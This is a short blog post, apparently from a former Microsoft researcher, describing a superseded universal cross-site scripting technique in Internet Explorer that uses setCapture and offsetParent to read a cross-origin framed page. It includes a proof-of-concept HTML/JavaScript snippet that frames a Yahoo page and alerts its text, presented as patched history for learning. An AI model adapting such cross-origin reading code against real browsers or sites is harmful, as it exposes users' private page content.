UXSS via setCapture and offsetParent (Superseded)

This was an early version of a cross-origin technique later superseded by entry #16. The approach loads a non-HTML file (feeds XML, MHT, SWF, XAML, etc.) into an iframe nested inside a cross-origin page, uses setCapture on the top window, and then clicks inside the non-HTML object. The event.srcElement becomes the WBControl hosting the non-HTML file, and its offsetParent is the hosting iframe element — which belongs to the cross-origin page.

<iframe src="http://autos.yahoo.com/" width="500" height="200"
        onload="focus_and_redirect_to_dummy_file()"></iframe>

<script language="JavaScript">
function focus_and_redirect_to_dummy_file()
{
    window[0][0].location = "focus_and_redirect_to_dummy_file.html";
}

function grabIt()
{
    document.all.capturedDiv.onclick = function()
    {
        alert(event.srcElement.offsetParent.ownerDocument.body.innerText);
    }
    setTimeout("document.all.capturedDiv.setCapture();",1000);
}
</script>
<div id="capturedDiv"></div>

This version was cancelled in favor of the cleaner offsetParent-as-frameElement technique in entry #16, which did not require the non-HTML file intermediary.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE8 X-Frame-Options Header Bypass] :: [RCE via Windows Desktop Search] >